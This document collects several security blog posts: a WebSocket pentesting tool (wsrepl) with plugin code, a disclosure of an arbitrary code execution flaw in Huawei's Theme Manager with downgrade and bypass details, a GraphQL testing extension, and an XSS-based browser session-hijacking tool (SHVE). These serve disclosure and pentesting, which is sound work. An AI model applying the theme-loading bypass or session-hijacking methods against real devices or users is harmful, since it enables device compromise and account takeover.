Streamlining Websocket Pentesting with wsrepl

17 July 2023 at 22:00

In an era defined by instant gratification, where life zips by quicker than a teenager’s TikTok scroll, WebSockets have evolved into the heartbeat of web applications. They’re the unsung heroes in data streaming and bilateral communication, serving up everything in real-time, because apparently, waiting is so last century.

However, when tasked with pentesting these WebSockets, it feels like you’re juggling flaming torches on a unicycle, atop a tightrope! Existing tools, while proficient in their specific realms, are much like mismatched puzzle pieces – they don’t quite fit together, leaving you to bridge the gaps. Consequently, you find yourself shifting from one tool to another, trying to manage them simultaneously and wishing for a more streamlined approach.

That’s where https://github.com/doyensec/wsrepl comes to the rescue. This tool, the latest addition to Doyensec’s security tools, is designed to simplify auditing of websocket-based apps. wsrepl strikes a much needed balance by offering an interactive REPL interface that’s user-friendly, while also being conveniently easy to automate. With wsrepl, we aim to turn the tide in websocket pentesting, providing a tool that is as efficient as it is intuitive.

The Doyensec Challenge

Once upon a time, we took up an engagement with a client whose web application relied heavily on WebSockets for soft real-time communication. This wasn’t an easy feat. The client had a robust bug bounty policy and had undergone multiple pentests before. Hence, we were fully aware that the lowest hanging fruits were probably plucked. Nevertheless, as true Doyensec warriors (‘doyen’ - a term Merriam-Webster describes as ‘a person considered to be knowledgeable or uniquely skilled as a result of long experience in some field of endeavor’), we were prepared to dig deeper for potential vulnerabilities.

Our primary obstacle was the application’s custom protocol for data streaming. Conventional wisdom among pentesters suggests that the most challenging targets are often the ones most overlooked. Intriguing, isn’t it?

The Quest for the Perfect Tool

The immediate go-to tool for pentesting WebSockets would typically be Burp Suite. While it’s a heavyweight in web pentesting, we found its implementation of WebSockets mirrored HTTP requests a little bit too closely, which didn’t sit well with near-realtime communications.

Sure, it does provide a neat way to get an interactive WS session, but it’s a bit tedious - navigating through ‘Upgrade: websocket’, hopping between ‘Repeater’, ‘Websocket’, ‘New WebSocket’, filling in details, and altering HTTP/2 to HTTP/1.1. The result is a decent REPL but the process? Not so much.

Initiating a new websocket in Burp

Don’t get me wrong, Burp does have its advantages. Pentesters already have it open most times, it highlights JSON or XML, and integrates well with existing extensions. Despite that, it falls short when you have to automate custom authentication schemes, protocols, connection tracking, or data serialization schemes.

Other tools, like websocketking.com and hoppscotch.io/realtime/websocket, offer easy-to-use and aesthetically pleasing graphical clients within the browser. However, they lack comprehensive options for automation. Tools like websocket-harness and WSSiP bridge the gap between HTTP and WebSockets, which can be useful, but again, they don’t offer an interactive REPL for manual inspection of traffic.

Finally, we landed on websocat, a netcat inspired command line WebSockets client that comes closest to what we had in mind. While it does offer a host of features, it’s predominantly geared towards debugging WebSocket servers, not pentesting.

wsrepl: The WebSockets Pentesting Hero

Enter wsrepl, born out of necessity as our answer to the challenges we faced. It is not just another pentesting tool, but an agile solution that sits comfortably in the middle - offering an interactive REPL experience while also providing a simple and convenient path to automation.

Built with Python’s fantastic TUI framework Textual, it enables an accessible experience that is easy to navigate both by mouse and keyboard. That’s just scratching the surface though. Its interoperability with curl’s arguments enables a fluid transition from the Upgrade request in Burp to wsrepl. All it takes is copying a request through the ‘Copy as curl command’ menu option and replacing curl with wsrepl.

Initiating a new WebSocket in wsrepl

On the surface, wsrepl is just like any other tool, showing incoming and outgoing traffic with the added option of sending new messages. The real magic however, is in the details. It leaves nothing to guesswork. Every hexadecimal opcode is shown as per RFC 6455, a feature that could potentially save you from many unnecessary debugging hours.

A lesson learned

Here’s an anecdote to illustrate this point. At the beginning of our engagement with WebSockets, I wasn’t thoroughly familiar with the WebSocket RFC and built my understanding based on what Burp showed me. However, Burp was only displaying text messages, obscuring message opcodes and autonomously handling pings without revealing them in the UI. This partial visibility led to some misconceptions about how WebSockets operate. The developers of the service we were testing seemingly had the same misunderstanding, as they implemented ping traffic using 0x1 - text type messages. This caused confusion and wasted time when my scripts kept losing the connection, even though the traffic appeared to align with my Burp observations.

To avoid similar pitfalls, wsrepl is designed to give you the whole picture, without any hidden corners. Here’s a quick rundown of the WebSocket opcodes defined in RFC 6455 that you can expect to see in wsrepl:

Opcode  Description
0x0     Continuation Frame
0x1     Text Frame
0x2     Binary Frame
0x8     Connection Close
0x9     Ping
0xA     Pong (must carry the same payload as the corresponding Ping frame)

Contrary to most WebSocket protocols that mainly use 0x1 type messages, wsrepl accompanies all messages with their opcodes, ensuring full transparency. We’ve intentionally made the decision not to conceal ping traffic by default, although you have the choice to hide them using the --hide-ping-pong option.
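If you want to poke at these opcodes yourself outside of wsrepl, the websocket-client Python library exposes them directly. A quick sketch against a placeholder endpoint:

import websocket  # pip install websocket-client
from websocket import ABNF

# The endpoint below is a placeholder - point it at your own target
ws = websocket.create_connection("wss://example.com/ws")

ws.send("hello")                                 # 0x1 text frame
ws.send(b"\x01\x02", opcode=ABNF.OPCODE_BINARY)  # 0x2 binary frame
ws.ping("probe")                                 # 0x9 protocol-level ping

frame = ws.recv_frame()                          # inspect the next raw frame
print(hex(frame.opcode), frame.data)             # e.g. 0xa echoing "probe"

ws.close()                                       # 0x8 connection close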

Additionally, wsrepl introduces the unique capability of sending ‘fake’ ping messages, that use the 0x1 message frame. Payloads can be defined with options --ping-0x1-payload and --pong-0x1-payload, and the interval controlled by --ping-0x1-interval. It also supports client-induced ping messages (protocol level, 0x9), even though typically this is done by the server: --ping-interval.

It’s also noteworthy that wsrepl incorporates an automatic reconnection feature in case of disconnects. Coupled with granular ping control, these features empower you to initiate long-lasting and stable WebSocket connections, which have proven useful for executing certain attacks.

Automation Made Simple with wsrepl

Moreover, wsrepl is crafted with a primary goal in mind: enabling you to quickly transition into WebSocket automation. To do this, you just need to write a Python plugin, which is pretty straightforward and, unlike Burp, feels quintessentially pythonic.

from wsrepl import Plugin

MESSAGES = [
    "hello",
    "world"
]

class Demo(Plugin):
    """Demo plugin that sends a static list of messages to the server."""
    def init(self):
        self.messages = MESSAGES

It’s Python, so really, the sky’s the limit. For instance, here is how to send a HTTP request to acquire the auth token, and then use it to authenticate with the WebSocket server:

from wsrepl import Plugin
from wsrepl.WSMessage import WSMessage

import json
import requests

class Demo(Plugin):
    """Demo plugin that dynamically acquires authentication token."""
    def init(self):
        # Here we simulate an API request to get a session token by supplying a username and password.
        # For the demo, we're using a dummy endpoint "https://hb.cran.dev/uuid" that returns a UUID.
        # In a real-life scenario, replace this with your own authentication endpoint and provide necessary credentials.
        token = requests.get("https://hb.cran.dev/uuid").json()["uuid"]

        # The acquired session token is then used to populate self.messages with an authentication message.
        # The exact format of this message will depend on your WebSocket server requirements.
        self.messages = [
            json.dumps({
                "auth": "session",
                "sessionId": token
            })
        ]

The plugin system is designed to be as flexible as possible. You can define hooks that are executed at various stages of the WebSocket lifecycle. For instance, you can use on_message_sent to modify messages before they are sent to the server, or on_message_received to parse and extract meaningful data from the server’s responses. The full list of hooks is as follows:

Order of wsrepl hook execution

Customizing the REPL UI

The true triumph of wsrepl lies in its capacity to automate even the most complicated protocols. It is easy to add custom serialization routines, allowing you to focus on the stuff that matters.

Say you’re dealing with a protocol that uses JSON for data serialization, and you’re only interested in a single field within that data structure. wsrepl allows you to hide all the boilerplate, yet preserve the option to retrieve the raw data when necessary.

from wsrepl import Plugin

import json
from wsrepl.WSMessage import WSMessage

class Demo(Plugin):
    async def on_message_sent(self, message: WSMessage) -> None:
        # Grab the original message entered by the user
        original = message.msg

        # Prepare a more complex message structure that our server requires.
        message.msg = json.dumps({
            "type": "message",
            "data": {
                "text": original
            }
        })

        # Short and long versions of the message are used for display purposes in REPL UI.
        # By default they are the same as 'message.msg', but here we modify them for better UX.
        message.short = original
        message.long = message.msg


    async def on_message_received(self, message: WSMessage) -> None:
        # Get the original message received from the server
        original = message.msg

        try:
            # Try to parse the received message and extract meaningful data.
            # The exact structure here will depend on your websocket server's responses.
            message.short = json.loads(original)["data"]["text"]
        except:
            # In case of a parsing error, let's inform the user about it in the history view.
            message.short = "Error: could not parse message"

        # Show the original message when the user focuses on it in the UI.
        message.long = original

In conclusion, wsrepl is designed to make your WebSocket pentesting life easier. It’s the perfect blend of an interactive REPL experience with the ease of automation. It may not be the magical solution to every challenge you’ll face in pentesting WebSockets, but it is a powerful tool in your arsenal. Give it a try and let us know your experiences!

Huawei Theme Manager Arbitrary Code Execution

25 July 2023 at 22:00

Back in 2019, we were lucky enough to take part in the newly-launched Huawei mobile bug bounty. For that, we decided to research Huawei’s Themes.

The Themes Manager allows custom themes on EMUI devices, enabling stylized preferences and the customization of lock screens, wallpapers and icons. Processes capable of making these types of system-wide changes need elevated privileges, making them valuable targets for both research and exploitation.

Background

When it comes to implementing a lockscreen on EMUI, there were three possible engines used:

  • com.ibimuyu.lockscreen
  • com.vlife.huawei.emuilock
  • com.huawei.ucdlockscreen

When installing a theme, the SystemUI.apk verifies the signature of the application attempting to make these changes against a hardcoded list of trusted ones. From what we observed, this process seems to have been implemented properly, with no clear way to bypass the signature checks.

That said, we discovered that when com.huawei.ucdlockscreen was used, it loaded additional classes at runtime. The signatures of these classes were not properly validated - in fact, they were not checked at all. This presented an opportunity for us to introduce our own code.

Taking a look at the structure of the theme archive files (.hwt), we see that the unlock screen elements are packaged as follows:

Archive Structure

Looking in the unlock directory, we saw the theme.xml file, which is a manifest specifying several properties. These settings included the dynamic unlock engine to use (ucdscreenlock in our case) and an ext.properties file, which allows for dynamic Java code loading from within the theme file.

Let’s look at the file content:

Archive Structure

This instructs the dynamic engine (com.huawei.ucdlockscreen) to load com.huawei.nova.ExtensionJarImpl at runtime from the NOVA6LockScreen2019120501.apk. Since this class is not validated, we can introduce our own code to achieve arbitrary code execution. What makes this even more interesting is that our code will run within a process of a highly privileged application (com.huawei.android.thememanager), as shown below.

Privileged Application List

Utilizing the logcat utility, we can see the dynamic loading process:

Process Logs

This vulnerability was confirmed via direct testing on EMUI 9.1 and 10, but appears to impact the current version of EMUI with some limitations*.

Theme in foreground with logcat in back

Impact

As previously mentioned, this results in arbitrary code execution using the PID of a highly privileged application. In our testing, exploitation resulted in obtaining around 200 Android and Huawei custom permissions. Among those were the permissions listed below which could result in total compromise of the device’s user data, sensitive system data, any credentials entered into the system and the integrity of the system’s environment.

Permissions List

Considering that the application can send intents requiring the huawei.android.permission.HW_SIGNATURE_OR_SYSTEM permission, we believe it is possible to leverage existing system functionalities to obtain system level code execution. Once achieved, this vulnerability has great potential as part of a rooting chain.

Exploitability

This issue can be reliably exploited with no technical impediments. That said, exploitation requires installing a custom theme, so accomplishing this remotely requires user interaction. We can conceive of several plausible social engineering scenarios that could be effective, or a second vulnerability could be used to force the download and installation of a theme. Firstly, it is possible to gift themes to other users, so a compromised trusted contact could be leveraged (or spoofed) to convince a victim to accept and install the malicious theme. As an example, the following URL will open the theme gift page: hwt://www.huawei.com/themes?type=33&id=0&from=AAAA&channelId=BBB

Theme gifting attack flow

Secondly, an attacker could publish a link or QR code pointing to the malicious theme online, then convince a victim into triggering the HwThemeManager application via a deep link using the hwt:// scheme.

To be fair, we must acknowledge that Huawei has a review process in place for new themes and wallpapers, which might limit the use of live themes exploiting this vulnerability.

Partial fix

Huawei released an update for HwThemeManager on February 24, 2022 (internally tracked as HWPSIRT-2019-12158) stating this was resolved. Despite this, we believe the issue was actually resolved in ucdlockscreen.apk (com.huawei.ucdlockscreen version 3 and later).

This is an important distinction, because the latest version of ucdlockscreen.apk is installed at runtime by HwThemeManager, after applying a theme that requires such an engine. Even on a stock phone (EMUI 9, 10, and the latest 12.0.0.149), an attacker with physical access can uninstall the latest version and install the old vulnerable version, since it is properly signed by Huawei.

Without further mitigations from Huawei, an attacker with physical access to the device can still leverage this vulnerability to gain system privileged access on even the latest devices.

Further discovery

After a few hours of reverse engineering the fix introduced in the latest version of com.huawei.ucdlockscreen (version 4.6), we discovered an additional bypass impacting the EMUI 9.1 release. This issue doesn’t require physical access and can again trigger the same exploitable condition.

During theme loading, the latest version of com.huawei.ucdlockscreen checks for the presence of a /data/themes/0/unlock/ucdscreenlock/error file. Since all of the files within /data/themes/0/ are copied from the provided theme (.hwt) file they can all be attacker-controlled.

This file is used to check the specific version of the theme. An attacker can simply embed an error file referencing an older version, forcing legacy theme support. When doing so, an attacker would also specify a fictitious package name in the ext.properties file. This combination of changes in the malicious .hwt file bypasses all the required checks - making the issue exploitable again on the latest EMUI 9.1, with no physical access required. At the time of our investigation, the other EMUI major versions appear to implement signature validation mechanisms to mitigate this.

Disclosure

This issue was disclosed on Dec 31, 2019 according to the terms of the Huawei Mobile Bug Bounty, and it was addressed by Huawei as described above. Additional research results were reported to Huawei on Sep 1, 2021. Given the time that has elapsed from the original fix and the fact that we believe the issue is no longer remotely exploitable, we have decided to release the details of the vulnerability.

At the time of writing this post (April 28th, 2023), the issue is still exploitable locally on the latest EMUI (12.0.0.149) by force-loading the vulnerable ucdlockscreen.apk. We have decided not to release the vulnerable version of ucdlockscreen.apk as well as the malicious theme proof-of-concept. While the issue is no longer interesting to attackers, it can still benefit the rooting community and facilitate the work of security researchers in identifying issues within Huawei’s EMUI-based devices.

Conclusions

While the vulnerability is technically interesting by itself, there are two security engineering lessons here. The biggest takeaway is clearly that while relying on signature validation for authenticating software components can be an effective security measure, it must be thoroughly extended to include any dynamically loaded code. That said, it appears Huawei no longer provides bootloader unlock options (see here), making rooting more complicated and expensive. It remains to be seen if this bug is ever used as part of a chain developed by the rooting community.

A secondary engineering lesson is that when we design backwards compatibility mechanisms, we should assume there will be older versions we eventually want to abandon - and plan for how to revoke them, since otherwise a properly signed legacy component can simply be reinstalled.

This research was made possible by the Huawei Mobile Phone Bug Bounty Program. We want to thank the Huawei PSIRT for their help in handling this issue, the generous bounty and the openness to disclose the details.

InQL v5: A Technical Deep Dive

16 August 2023 at 22:00

We’re thrilled to pull back the curtain on the latest iteration of our widely-used Burp Suite extension - InQL. Version 5 introduces significant enhancements and upgrades, solidifying its place as an indispensable tool for penetration testers and bug bounty hunters.

InQL v5.0

Introduction

The cybersecurity landscape is in a state of constant flux. As GraphQL adoption surges, the demand for an adaptable, resilient testing tool has become paramount. As leaders in GraphQL security, Doyensec is proud to reveal the most recent iteration of our open-source testing tool - InQL v5.x. This isn’t merely an update; it’s a comprehensive revamp designed to augment your GraphQL testing abilities.

The Journey So Far: From Jython to Kotlin

Our journey with InQL started on the Jython platform. However, as time went by, we began to experience the limitations of Jython - chiefly, its lack of support for Python 3, which made it increasingly difficult to find compatible tooling and libraries. It was clear a transition was needed. After careful consideration, we chose Kotlin. Not only is it compatible with Java (which Burp is written in), but it also offers robustness, flexibility, and a thriving developer community.

The Challenges of Converting a Burp Extension Into Kotlin

We opted to include the entire Jython runtime (over 40 MB) within the Kotlin extension to overcome the challenges of reusing the existing Jython code. Although it wasn’t the ideal solution, this approach allowed us to launch the extension as Kotlin, initiate the Jython interpreter, and delegate execution to the older Jython code.

class BurpExtender: IBurpExtender, IExtensionStateListener, BurpExtension {

    private var legacyApi: IBurpExtenderCallbacks? = null
    private var montoya: MontoyaApi? = null

    private var jython: PythonInterpreter? = null
    private var pythonPlugin: PyObject? = null

    // Legacy API gets instantiated first
    override fun registerExtenderCallbacks(callbacks: IBurpExtenderCallbacks) {

        // Save legacy API for the functionality that still relies on it
        legacyApi = callbacks

        // Start embedded Python interpreter session (Jython)
        jython = PythonInterpreter()
    }

    // Montoya API gets instantiated second
    override fun initialize(montoyaApi: MontoyaApi) {
        // The new Montoya API should be used for all of the new functionality in InQL
        montoya = montoyaApi

        // Set the name of the extension
        montoya!!.extension().setName("InQL")

        // Instantiate the legacy Python plugin
        pythonPlugin = legacyPythonPlugin()

        // Pass execution to legacy Python code
        pythonPlugin!!.invoke("registerExtenderCallbacks")
    }

    private fun legacyPythonPlugin(): PyObject {
        // Make sure UTF-8 is used by default
        jython!!.exec("import sys; reload(sys); sys.setdefaultencoding('UTF8')")

        // Pass callbacks received from Burp to Python plugin as a global variable
        jython!!.set("callbacks", legacyApi)
        jython!!.set("montoya", montoya)

        // Instantiate legacy Python plugin
        jython!!.exec("from inql.extender import BurpExtenderPython")
        val legacyPlugin: PyObject = jython!!.eval("BurpExtenderPython(callbacks, montoya)")

        // Delete global after it has been consumed
        jython!!.exec("del callbacks, montoya")

        return legacyPlugin
    }
}

Sidestepping the need for stickytape

Our switch to Kotlin also solved another problem. Jython extensions in Burp Suite are typically a single .py file, but the complexity of InQL necessitates a multi-file layout. Previously, we used the stickytape library to compress the Python code into a single file. However, stickytape introduced subtle bugs and inhibited access to static files. By making InQL a Kotlin extension, we can now bundle all files into a JAR and access them correctly.

Introducing GQLSpection: The Core of InQL v5.x

A significant milestone in our transition journey involved refactoring the core portion of InQL that handles GraphQL schema parsing. The result is GQLSpection - a standalone library compatible with Python 2/3 and Jython, featuring a convenient CLI interface. We’ve included all GraphQL code examples from the GraphQL specification in our test cases, ensuring comprehensive coverage.

As an added advantage, it also replaces the standalone and CLI modes of the previous InQL version, which were removed to streamline our code base.

GQLSpection

New Features

Our clients rely heavily on cutting-edge technologies. As such, we frequently have the opportunity to engage with real-world GraphQL deployments in many of our projects. This rich exposure has allowed us to understand the challenges InQL users face and the requirements they have, enabling us to decide which features to implement. In response to these insights, we’ve introduced several significant features in InQL v5.0 to support more effective and efficient audits and investigations.

Points of Interest

One standout feature in this version is ‘Points of Interest’. Powered by GQLSpection and with the initial implementation contributed by @schoobydrew, this is essentially a keyword scan equipped with several customizable presets.

Points of Interest settings

The Points of Interest scan proves exceptionally useful when analyzing extensive schemas with over 50 queries/mutations and thousands of fields. It produces reports in both human-readable text and JSON format, providing a high-level overview of the vast schemas often found in modern apps, and aiding pentesters in swiftly identifying sensitive data or dangerous functionality within the schema.

Points of Interest results

Improved Logging

One of my frustrations with earlier versions of the tool was the lack of useful error messages when the parser broke on real-world schemas. So, I introduced configurable logging. This, coupled with the fact that parsing functionality is now handled by GQLSpection, has made InQL v5.0 much more reliable and user-friendly.

In-line Annotations

Another important addition to InQL is annotations. Prior to this, InQL only generated the bare minimum query, necessitating the use of other tools to deduce the correct input format, expected values, etc. However, with the addition of inline comments populated with content from ‘description’ fields in the GraphQL schema or type annotations, InQL v5.0 has become much more of a standalone tool.

Annotations

There is a trade-off here: while the extensive annotations make InQL more usable, they can sometimes make it hard to comprehend and navigate. We’re looking at solutions for future releases to dynamically limit the display of annotations.

The Future of InQL and GraphQL Security

Our roadmap for InQL is ambitious. To start, we are committed to reintroducing features like GraphiQL and Circular Relationship Detection, achieving full feature parity with v4.

As GraphQL continues to grow, ensuring robust security is crucial. InQL’s future involves addressing niche GraphQL features that are often overlooked and improving upon existing pentesting tools. We look forward to sharing more developments with the community.

InQL: A Great Project for Students and Contributors

InQL is not just a tool, it’s a project – a project that invites the contributions of those who are passionate about cybersecurity. We’re actively seeking students and developers who would like to contribute to InQL or do GraphQL-adjacent security research. This is an opportunity to work with experts in GraphQL security, and play a part in shaping the future of InQL.

DoyensecInQL

Conclusion

InQL v5.x is the result of relentless work and an unwavering commitment to enhancing GraphQL security. We urge all pentesters, bug hunters, and cybersecurity enthusiasts working with GraphQL to try out this new release. If you’ve tried InQL in the past and are looking forward to enhancements, v5.0 will not disappoint.

At Doyensec, we’re not just developing a tool, we’re pushing the boundaries of what’s possible in GraphQL security. We invite you to join us on this journey, whether as a user, contributor, or intern.

Happy Hacking!

Introducing Session Hijacking Visual Exploitation (SHVE): An Innovative Open-Source Tool for XSS Exploitation

31 August 2023 at 04:00

SHVE-logo

Greetings, folks! Today, we’re thrilled to introduce you to our latest tool: Session Hijacking Visual Exploitation, or SHVE. This open-source tool, now available on our GitHub, offers a novel way to hijack a victim’s browser sessions, utilizing them as a visual proxy after hooking via an XSS or a malicious webpage. While some exploitation frameworks, such as BeEF, do provide hooking features, they don’t allow remote visual interactions.

SHVE’s interaction with a victim’s browser in the security context of the user relies on a design incorporating multiple elements. These components, each fulfilling a specific function, form an interconnected system that allows precise, controlled session hijacking. Let’s take a closer look at each of them:

  • VictimServer: This component serves the malicious JavaScript. Furthermore, it establishes a WebSocket connection to the hooked browsers, facilitating the transmission of commands from the server to the victim’s browser.

  • AttackerServer: This is the connection point for the attacker client. It supplies all the necessary information to the attacker, such as the details of the different hooked sessions.

  • Proxy: When the client enters Visual or Interactive mode, it connects to this proxy. The proxy, in turn, uses functionalities provided by the VictimServer to conduct all requests through the hooked browser.

SHVE-architecture

The tool comes with two distinctive modes - Visual and Interactive - for versatile usage.

  • Visual Mode: The tool provides a real-time view of the victim’s activities. This is particularly useful when exploiting an XSS, as it allows the attacker to witness the victim’s interactions that otherwise might be impossible to observe. For instance, if a victim accesses a real-time chat that isn’t stored for later review, the attacker could see this live interaction.

  • Interactive Mode: This mode provides a visual gateway to any specified web application. Since the operations are carried out using the victim’s security context via the hooked browser, detection from the server side becomes significantly more challenging. Unlike typical XSS or CORS misconfiguration exploitation, there’s no need to steal information like Cookies or Local Storage. Instead, the tool uses XHR requests, ensuring CSRF tokens are automatically sent, as both victim and attacker view the same HTML.

Getting Started

We’ve tried to make the installation process as straightforward as possible. You’ll need to have Node.js and npm installed on your system. After cloning our repository, navigate to the server and client directories to install their respective dependencies. Start the server and client, follow the initial setup steps, and you’re ready to go! For the full installation guide, please refer to the README file.

We’ve recorded a video showcasing these modes and demonstrating how to exploit XSS and CORS misconfigurations using one of PortSwigger’s Web Security Academy labs. Here is how SHVE works:

We look forward to your contributions and insights, and can’t wait to see how you’ll use SHVE in your red team engagements. Happy hacking!

Thanks to Michele Orru and Giuseppe Trotta for their early-stage feedback and ideas.
